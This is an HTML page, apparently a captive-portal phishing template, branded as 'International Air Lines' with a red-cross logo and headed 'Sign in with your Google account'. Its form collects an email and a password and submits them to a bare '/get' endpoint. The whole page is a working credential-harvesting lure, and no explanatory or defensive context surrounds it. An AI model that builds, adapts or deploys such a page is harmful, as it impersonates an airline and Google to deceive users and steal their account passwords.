<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.brand-name {
  font-size: 42px;
  color: #CD0000;
  margin-left: 20px;
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #CD0000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #CD0000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #CD0000;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #CD0000;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #FFC72C;
}


</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="438.000000pt" height="115.000000pt" viewBox="0 0 438.000000 115.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,115.000000) scale(0.100000,-0.100000)"
fill="#CD0000" stroke="none">
<path d="M654 793 c-115 -142 -291 -360 -392 -485 l-183 -228 533 0 533 0 118
478 c64 262 117 480 117 485 0 4 -117 7 -259 7 l-260 0 -207 -257z m326 -28
l0 -104 108 -3 107 -3 0 -90 0 -90 -107 -3 -108 -3 0 -99 0 -100 -90 0 -90 0
0 103 0 102 -102 0 -103 0 -3 93 -3 92 106 0 105 0 0 105 0 105 90 0 90 0 0
-105z"/>
<path d="M1643 876 c-91 -30 -133 -85 -133 -174 0 -90 53 -141 193 -188 127
-42 165 -95 105 -146 -31 -28 -103 -24 -133 7 -14 13 -25 31 -25 40 0 12 -14
15 -75 15 -74 0 -75 0 -75 -26 0 -46 39 -100 92 -129 58 -32 177 -44 244 -26
102 28 158 103 152 204 -7 94 -48 132 -202 183 -79 27 -126 59 -126 87 0 8 8
25 18 38 27 32 107 32 134 0 10 -13 18 -29 18 -37 0 -11 18 -14 76 -14 l77 0
-6 37 c-14 86 -89 135 -212 140 -48 2 -96 -3 -122 -11z"/>
<path d="M3378 876 c-105 -39 -147 -110 -126 -211 15 -71 58 -107 172 -145 52
-17 106 -40 120 -51 32 -25 34 -71 6 -99 -42 -42 -160 -12 -160 41 0 17 -8 19
-80 19 l-79 0 5 -32 c17 -92 95 -148 219 -156 175 -11 283 71 273 208 -7 98
-58 142 -214 189 -101 30 -142 83 -96 124 44 40 135 23 148 -27 6 -25 9 -26
80 -26 86 0 89 6 52 80 -34 66 -89 93 -198 97 -55 2 -98 -2 -122 -11z"/>
<path d="M3936 876 c-59 -22 -88 -47 -114 -97 -18 -34 -22 -54 -18 -87 12 -93
56 -133 193 -177 98 -31 133 -56 133 -94 0 -85 -149 -98 -180 -15 -9 22 -15
24 -85 24 -65 0 -75 -2 -75 -17 1 -32 37 -99 65 -121 61 -48 196 -66 288 -38
122 37 176 143 130 257 -21 53 -79 91 -191 125 -90 28 -122 51 -122 87 0 73
131 86 160 17 12 -29 14 -30 87 -30 l75 0 -7 33 c-20 93 -90 139 -220 144 -53
2 -93 -2 -119 -11z"/>
<path d="M2010 876 c0 -5 115 -422 156 -563 l15 -53 82 0 83 0 58 203 c32 111
61 205 65 209 3 4 33 -87 65 -203 l60 -209 82 0 82 0 11 33 c14 45 161 575
161 582 0 3 -35 5 -77 3 l-77 -3 -50 -202 c-28 -112 -53 -203 -56 -203 -3 0
-32 92 -64 205 l-59 205 -77 0 -76 0 -60 -205 c-32 -113 -61 -205 -64 -205 -3
0 -28 91 -56 203 l-50 202 -77 3 c-42 2 -77 1 -77 -2z"/>
<path d="M3000 570 l0 -310 80 0 80 0 0 310 0 310 -80 0 -80 0 0 -310z"/>
</g>
</svg>





    <div class="brand-name">International Air Lines</div>
  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b>Google</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
      <button class="submit-btn" type="submit"><b>Continue</b></button>
    </form>

  </div>

</div>
</body>
</html>
